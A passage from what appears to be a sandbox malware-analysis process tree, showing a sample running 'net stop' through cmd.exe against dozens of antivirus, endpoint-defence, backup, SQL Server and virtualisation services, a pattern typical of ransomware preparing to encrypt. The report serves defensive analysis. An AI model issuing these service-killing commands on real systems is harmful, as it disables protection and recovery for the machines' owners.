      PID:6180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SamSs"
  2⤵
  PID:6204
- - C:\Windows\system32\net.exe
    net stop "SamSs"
    3⤵
    PID:6240
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SamSs"
      4⤵
      PID:6252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SAVAdminService"
  2⤵
  PID:6288
- - C:\Windows\system32\net.exe
    net stop "SAVAdminService"
    3⤵
    PID:6296
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SAVAdminService"
      4⤵
      PID:6324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SAVService"
  2⤵
  PID:6336
- - C:\Windows\system32\net.exe
    net stop "SAVService"
    3⤵
    PID:6344
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SAVService"
      4⤵
      PID:6360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Smcinst"
  2⤵
  PID:6376
- - C:\Windows\system32\net.exe
    net stop "Smcinst"
    3⤵
    PID:3768
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Smcinst"
      4⤵
      PID:6392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SmcService"
  2⤵
  PID:6404
- - C:\Windows\system32\net.exe
    net stop "SmcService"
    3⤵
    PID:6412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SmcService"
      4⤵
      PID:6424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SMTPSvc"
  2⤵
  PID:6440
- - C:\Windows\system32\net.exe
    net stop "SMTPSvc"
    3⤵
    PID:6456
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SMTPSvc"
      4⤵
      PID:3560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SNAC"
  2⤵
  PID:6476
- - C:\Windows\system32\net.exe
    net stop "SNAC"
    3⤵
    PID:6484
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SNAC"
      4⤵
      PID:6500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SntpService"
  2⤵
  PID:6524
- - C:\Windows\system32\net.exe
    net stop "SntpService"
    3⤵
    PID:6532
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SntpService"
      4⤵
      PID:6552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "sophossps"
  2⤵
  PID:6568
- - C:\Windows\system32\net.exe
    net stop "sophossps"
    3⤵
    PID:6608
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "sophossps"
      4⤵
      PID:6600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"
  2⤵
  PID:6624
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$BKUPEXEC"
    3⤵
    PID:6636
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"
      4⤵
      PID:6652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"
  2⤵
  PID:3256
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$ECWDB2"
    3⤵
    PID:2576
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$ECWDB2"
      4⤵
      PID:3608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"
  2⤵
  PID:4088
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$PRACTTICEBGC"
    3⤵
    PID:1224
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"
      4⤵
      PID:4160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"
  2⤵
  PID:3568
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$PRACTTICEMGT"
    3⤵
    PID:4200
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"
      4⤵
      PID:4412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"
  2⤵
  PID:4608
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$PROFXENGAGEMENT"
    3⤵
    PID:4684
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"
      4⤵
      PID:4800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"
  2⤵
  PID:2764
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SBSMONITORING"
    3⤵
    PID:444
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"
      4⤵
      PID:2476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"
  2⤵
  PID:2708
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SHAREPOINT"
    3⤵
    PID:1988
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"
      4⤵
      PID:3480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"
  2⤵
  PID:3632
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SQL_2008"
    3⤵
    PID:3396
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SQL_2008"
      4⤵
      PID:2284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"
  2⤵
  PID:6672
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SYSTEM_BGC"
    3⤵
    PID:3936
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"
      4⤵
      PID:3956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"
  2⤵
  PID:6676
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$TPS"
    3⤵
    PID:5224
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$TPS"
      4⤵
      PID:5308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"
  2⤵
  PID:5340
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$TPSAMA"
    3⤵
    PID:5404
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$TPSAMA"
      4⤵
      PID:5592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
  2⤵
  PID:5616
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$VEEAMSQL2008R2"
    3⤵
    PID:5644
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:5664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"
  2⤵
  PID:5788
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$VEEAMSQL2012"
    3⤵
    PID:6684
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"
      4⤵
      PID:6056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLBrowser"
  2⤵
  PID:6120
- - C:\Windows\system32\net.exe
    net stop "SQLBrowser"
    3⤵
    PID:6136
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLBrowser"
      4⤵
      PID:3908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"
  2⤵
  PID:200
- - C:\Windows\system32\net.exe
    net stop "SQLSafeOLRService"
    3⤵
    PID:2196
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLSafeOLRService"
      4⤵
      PID:3372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"
  2⤵
  PID:1584
- - C:\Windows\system32\net.exe
    net stop "SQLSERVERAGENT"
    3⤵
    PID:2404
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLSERVERAGENT"
      4⤵
      PID:1304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"
  2⤵
  PID:6188
- - C:\Windows\system32\net.exe
    net stop "SQLTELEMETRY"
    3⤵
    PID:6192
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLTELEMETRY"
      4⤵
      PID:6216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"
  2⤵
  PID:6280
- - C:\Windows\system32\net.exe
    net stop "SQLTELEMETRY$ECWDB2"
    3⤵
    PID:6320
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"
      4⤵
      PID:2340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLWriter"
  2⤵
  PID:6628
- - C:\Windows\system32\net.exe
    net stop "SQLWriter"
    3⤵
    PID:6704
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLWriter"
      4⤵
      PID:6728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SstpSvc"
  2⤵
  PID:6748
- - C:\Windows\system32\net.exe
    net stop "SstpSvc"
    3⤵
    PID:300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SstpSvc"
      4⤵
      PID:6776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "svcGenericHost"
  2⤵
  PID:6792
- - C:\Windows\system32\net.exe
    net stop "svcGenericHost"
    3⤵
    PID:6804
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "svcGenericHost"
      4⤵
      PID:6812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "tmlisten"
  2⤵
  PID:6828
- - C:\Windows\system32\net.exe
    net stop "tmlisten"
    3⤵
    PID:6836
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "tmlisten"
      4⤵
      PID:6848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "TrueKey"
  2⤵
  PID:6860
- - C:\Windows\system32\net.exe
    net stop "TrueKey"
    3⤵
    PID:6872
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "TrueKey"
      4⤵
      PID:6904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "UI0Detect"
  2⤵
  PID:6924
- - C:\Windows\system32\net.exe
    net stop "UI0Detect"
    3⤵
    PID:6932
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "UI0Detect"
      4⤵
      PID:6940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"
  2⤵
  PID:6952
- - C:\Windows\system32\net.exe
    net stop "VeeamBackupSvc"
    3⤵
    PID:6956
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamBackupSvc"
      4⤵
      PID:6984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"
  2⤵
  PID:7008
- - C:\Windows\system32\net.exe
    net stop "VeeamBrokerSvc"
    3⤵
    PID:7016
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamBrokerSvc"
      4⤵
      PID:7036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"
  2⤵
  PID:7048
- - C:\Windows\system32\net.exe
    net stop "VeeamCatalogSvc"
    3⤵
    PID:5388
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamCatalogSvc"
      4⤵
      PID:7088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"
  2⤵
  PID:7108
- - C:\Windows\system32\net.exe
    net stop "VeeamCloudSvc"
    3⤵
    PID:7116
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamCloudSvc"
      4⤵
      PID:7124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"
  2⤵
  PID:876
- - C:\Windows\system32\net.exe
    net stop "VeeamDeploymentService"
    3⤵
    PID:7160
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamDeploymentService"
      4⤵
      PID:7148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"
  2⤵
  PID:5660
- - C:\Windows\system32\net.exe
    net stop "VeeamDeploySvc"
    3⤵
    PID:5692
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamDeploySvc"
      4⤵
      PID:3964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"
  2⤵
  PID:3896
- - C:\Windows\system32\net.exe
    net stop "VeeamEnterpriseManagerSvc"
    3⤵
    PID:5732
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"
      4⤵
      PID:3240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"
  2⤵
  PID:3108
- - C:\Windows\system32\net.exe
    net stop "VeeamMountSvc"
    3⤵
    PID:1968
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamMountSvc"
      4⤵
      PID:5948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"
  2⤵
  PID:6032
- - C:\Windows\system32\net.exe
    net stop "VeeamNFSSvc"
    3⤵
    PID:6128
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamNFSSvc"
      4⤵
      PID:2328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"
  2⤵
  PID:2096
- - C:\Windows\system32\net.exe
    net stop "VeeamRESTSvc"
    3⤵
    PID:1216
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamRESTSvc"
      4⤵
      PID:3684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"
  2⤵
  PID:3088
- - C:\Windows\system32\net.exe
    net stop "VeeamTransportSvc"
    3⤵
    PID:3124
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamTransportSvc"
      4⤵
      PID:3380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "W3Svc"
  2⤵
  PID:232
- - C:\Windows\system32\net.exe
    net stop "W3Svc"
    3⤵
    PID:884
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "W3Svc"
      4⤵
      PID:2876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "wbengine"
  2⤵
  PID:608
- - C:\Windows\system32\net.exe
    net stop "wbengine"
    3⤵
    PID:2168
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "wbengine"
      4⤵
      PID:3012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "WRSVC"
  2⤵
  PID:4136
- - C:\Windows\system32\net.exe
    net stop "WRSVC"
    3⤵
    PID:3252
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "WRSVC"
      4⤵
      PID:3720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
  2⤵
  PID:4188
- - C:\Windows\system32\net.exe
    net stop "MSSQL$VEEAMSQL2008R2"
    3⤵
    PID:4228
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
      4⤵
      PID:4236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
  2⤵
  PID:4276
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$VEEAMSQL2008R2"
    3⤵
    PID:4284
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"
  2⤵
  PID:4320
- - C:\Windows\system32\net.exe
    net stop "VeeamHvIntegrationSvc"
    3⤵
    PID:4340
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"
      4⤵
      PID:4360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "swi_update"
  2⤵
  PID:6752
- - C:\Windows\system32\net.exe
    net stop "swi_update"
    3⤵
    PID:6864
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "swi_update"
      4⤵
      PID:6960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"
  2⤵
  PID:6996
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$CXDB"
    3⤵
    PID:7080
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$CXDB"
      4⤵
      PID:4364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"
  2⤵
  PID:7132
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$CITRIX_METAFRAME"
    3⤵
    PID:4400
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"
      4⤵
      PID:4004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQL Backups"
  2⤵
  PID:2660
- - C:\Windows\system32\net.exe
    net stop "SQL Backups"
    3⤵
    PID:764
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQL Backups"
      4⤵
      PID:3656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"
  2⤵
  PID:4180
- - C:\Windows\system32\net.exe
    net stop "MSSQL$PROD"
    3⤵
    PID:4192
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$PROD"
      4⤵
      PID:4224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"
  2⤵
  PID:4256
- - C:\Windows\system32\net.exe
    net stop "Zoolz 2 Service"
    3⤵
    PID:4332
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Zoolz 2 Service"
      4⤵
      PID:6572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"
  2⤵
  PID:4440
- - C:\Windows\system32\net.exe
    net stop "MSSQLServerADHelper"
    3⤵
    PID:4512
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLServerADHelper"
      4⤵
      PID:4584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"
  2⤵
  PID:4596
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$PROD"
    3⤵
    PID:4624
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$PROD"
      4⤵
      PID:4636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"
  2⤵
  PID:4968
- - C:\Windows\system32\net.exe
    net stop "msftesql$PROD"
    3⤵
    PID:4656
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "msftesql$PROD"
      4⤵
      PID:4672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"
  2⤵
  PID:4688
- - C:\Windows\system32\net.exe
    net stop "NetMsmqActivator"
    3⤵
    PID:4700
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "NetMsmqActivator"
      4⤵
      PID:3224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "EhttpSrv"
  2⤵
  PID:4736
- - C:\Windows\system32\net.exe
    net stop "EhttpSrv"
    3⤵
    PID:4716
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "EhttpSrv"
      4⤵
      PID:4728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ekrn"
  2⤵
  PID:5024
- - C:\Windows\system32\net.exe
    net stop "ekrn"
    3⤵
    PID:5016
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ekrn"
      4⤵
      PID:4988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ESHASRV"
  2⤵
  PID:4952
- - C:\Windows\system32\net.exe
    net stop "ESHASRV"
    3⤵
    PID:4924
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ESHASRV"
      4⤵
      PID:4948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"
  2⤵
  PID:4888
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SOPHOS"
    3⤵
    PID:4860
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SOPHOS"
      4⤵
      PID:4840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"
  2⤵
  PID:4824
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SOPHOS"
    3⤵
    PID:4808
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SOPHOS"
      4⤵
      PID:4616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "AVP"
  2⤵
  PID:4576
- - C:\Windows\system32\net.exe
    net stop "AVP"
    3⤵
    PID:4560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "AVP"
      4⤵
      PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "klnagent"
  2⤵
  PID:1852
- - C:\Windows\system32\net.exe
    net stop "klnagent"
    3⤵
    PID:4532
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "klnagent"
      4⤵
      PID:4524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"
  2⤵
  PID:4492
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SQLEXPRESS"
    3⤵
    PID:4476
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"
      4⤵
      PID:4456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"
  2⤵
  PID:4404
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SQLEXPRESS"
    3⤵
    PID:4436
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"
      4⤵
      PID:4508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "wbengine"
  2⤵
  PID:4904
- - C:\Windows\system32\net.exe
    net stop "wbengine"
    3⤵
    PID:5028
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "wbengine"
      4⤵
      PID:5008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "HvHost"
  2⤵
  PID:4960
- - C:\Windows\system32\net.exe
    net stop "HvHost"
    3⤵
    PID:4872
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "HvHost"
      4⤵
      PID:4864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"
  2⤵
  PID:1592
- - C:\Windows\system32\net.exe
    net stop "vmickvpexchange"
    3⤵
    PID:4488
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmickvpexchange"
      4⤵
      PID:5088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"
  2⤵
  PID:5076
- - C:\Windows\system32\net.exe
    net stop "vmicguestinterface"
    3⤵
    PID:5068
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicguestinterface"
      4⤵
      PID:5064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicshutdown"
  2⤵
  PID:5044
- - C:\Windows\system32\net.exe
    net stop "vmicshutdown"
    3⤵
    PID:1620
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicshutdown"
      4⤵
      PID:5104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"
  2⤵
  PID:5116
- - C:\Windows\system32\net.exe
    net stop "vmicheartbeat"
    3⤵
    PID:892
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicheartbeat"
      4⤵
      PID:3128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmcompute"
  2⤵
  PID:212
- - C:\Windows\system32\net.exe
    net stop "vmcompute"
    3⤵
    PID:2772
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmcompute"
      4⤵
      PID:1872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicvmsession"
  2⤵
  PID:3028
- - C:\Windows\system32\net.exe
    net stop "vmicvmsession"
    3⤵
    PID:2368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicvmsession"
      4⤵
      PID:2596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicrdv"
  2⤵
  PID:1164
- - C:\Windows\system32\net.exe
    net stop "vmicrdv"
    3⤵
    PID:3496
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicrdv"
      4⤵
      PID:3692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmictimesync"
  2⤵
  - System Time Discovery
  PID:2920
- - C:\Windows\system32\net.exe
    net stop "vmictimesync"
    3⤵
    - System Time Discovery
    PID:2704
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmictimesync"
      4⤵
      System Time Discovery
      PID:1412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicvss"
  2⤵
  PID:1596
- - C:\Windows\system32\net.exe
    net stop "vmicvss"
    3⤵
    PID:3296
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicvss"
      4⤵
      PID:2448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMAuthdService"
  2⤵
  PID:3144
- - C:\Windows\system32\net.exe
    net stop "VMAuthdService"
    3⤵
    PID:3084
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMAuthdService"
      4⤵
      PID:2540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"
  2⤵
  PID:2300
- - C:\Windows\system32\net.exe
    net stop "VMnetDHCP"
    3⤵
    PID:1796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMnetDHCP"
      4⤵
      PID:2132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"
  2⤵
  PID:1684
- - C:\Windows\system32\net.exe
    net stop "VMware NAT Service"
    3⤵
    PID:3368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMware NAT Service"
      4⤵
      PID:1924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"
  2⤵
  PID:3676
- - C:\Windows\system32\net.exe
    net stop "VMUSBArbService"
    3⤵
    PID:2152
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMUSBArbService"
      4⤵
      PID:2068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMwareHostd"
  2⤵
  PID:2192
- - C:\Windows\system32\net.exe
    net stop "VMwareHostd"
    3⤵
    PID:828
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMwareHostd"
      4⤵
      PID:2812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sense"
  2⤵
  PID:2936
- - C:\Windows\system32\net.exe
    net stop "Sense"
    3⤵
    PID:3944
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sense"
      4⤵
      PID:1736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "WdNisSvc"
  2⤵
  PID:2700
- - C:\Windows\system32\net.exe
    net stop "WdNisSvc"
    3⤵
    PID:1792
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "WdNisSvc"
      4⤵
      PID:344
- C:\Windows\system32\cmd.exe
